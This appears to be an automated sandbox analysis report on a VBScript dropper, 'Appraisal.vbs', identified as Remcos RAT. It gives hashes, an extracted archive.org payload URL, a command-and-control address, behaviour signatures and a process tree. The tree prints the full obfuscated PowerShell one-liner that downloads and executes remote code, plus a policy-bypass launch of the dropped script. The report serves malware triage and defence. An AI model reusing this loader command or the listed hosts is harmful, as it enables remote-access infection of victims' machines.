Overview

overview

10

Static

static

Appraisal.vbs

windows7_x64

10

Appraisal.vbs

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    26-04-2021 10:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Appraisal.vbs

  • Size

    706B

  • MD5

    b201aa5242dd9b32ec9c38e1f999c723

  • SHA1

    61ab2c43d19c6441e394561e0441890168b9a9ab

  • SHA256

    d2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55

  • SHA512

    a21aeb8a0ec963875d75ba4920f3bde9a134717a910b94a2743ab7051dabe9e17a5e0a15aeb51be26373f0cb6313b6c964bef2ebb318061074399296d5c5ddfc

Score
10/10
remcosrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601406.us.archive.org/10/items/all_20210426/ALL.TXT

Extracted

Family

remcos

C2

185.19.85.168:1723

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://ia601406.us.archive.org/10/items/all_20210426/ALL.TXT'))))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1528
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          #cmd
          4⤵
            PID:688
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            #cmd
            4⤵
            • Suspicious use of SetWindowsHookEx
            PID:660

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      MD5

      a594dabcc0c80881e3f574a5fc7812f0

      SHA1

      ac163a0e57a0d49042ee96ee57ee0462e3208086

      SHA256

      0eb2bae25a4c9e5e93bb5874ee44cb0815419d046ac66770255be6ad939c5f5d

      SHA512

      653985f7fad5579c713eb81ae33bc4f1fc47811907eca4b98d206e1c3cc4e0b96b617bc25edeb257cf359101811b2f918eca3c46e481f057cf528931c78bd8f2

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      0b176047694f22b25552fa6739bce32e

      SHA1

      03ff70b639bccc339714fe265e5b801d0733497d

      SHA256

      82ff29a428d59a1dd9902d782998cd2fa776b196a782c1196b0b9dbcb595b3eb

      SHA512

      c32f341f40abe5be1d6577e4a6cb1bee1da16d4c3b9272203a76777394809e77888d3392757e827780303dfd63678258186756d2320eac63ce1d37d44aa6abad

      Download Submit
    • C:\Users\Public\ Microsoft.ps1
      MD5

      3dd793f6fdb49034bfaed9d1975a32e5

      SHA1

      13bbbb0b874f1c097eb80382a3266cefec632a2e

      SHA256

      de9a6d430a80d2b466e959d4e7e8e3fa6c7384670bdab6fc2881df2ed4b12a37

      SHA512

      f4ca7f706f259d2a5b3e925c25da97093783946c85ef5dce76cd9f28f79539de44ad784c457ada7aed77e3998011831b8101e03576be20252539fe7f27e3e0c7

      Download Submit
    • memory/660-88-0x0000000000400000-0x0000000000478000-memory.dmp
      Filesize

      480KB

      Download
    • memory/660-86-0x0000000076281000-0x0000000076283000-memory.dmp
      Filesize

      8KB

      Download
    • memory/660-85-0x000000000042EEEF-mapping.dmp
      Download
    • memory/660-84-0x0000000000400000-0x0000000000478000-memory.dmp
      Filesize

      480KB

      Download
    • memory/1528-71-0x0000000000000000-mapping.dmp
      Download
    • memory/1528-77-0x0000000002670000-0x0000000002672000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1528-87-0x0000000001FA0000-0x0000000001FA1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1528-83-0x0000000002630000-0x000000000264F000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1528-78-0x0000000002674000-0x0000000002676000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1992-66-0x000000001ABA0000-0x000000001ABA2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1992-68-0x0000000002510000-0x0000000002511000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1992-69-0x000000001C300000-0x000000001C301000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1992-67-0x000000001ABA4000-0x000000001ABA6000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1992-65-0x00000000025C0000-0x00000000025C1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1992-64-0x000000001AC20000-0x000000001AC21000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1992-63-0x0000000002450000-0x0000000002451000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1992-70-0x000000001C5A0000-0x000000001C5A1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1992-61-0x0000000000000000-mapping.dmp
      Download
    • memory/2020-60-0x000007FEFC141000-0x000007FEFC143000-memory.dmp
      Filesize

      8KB

      Download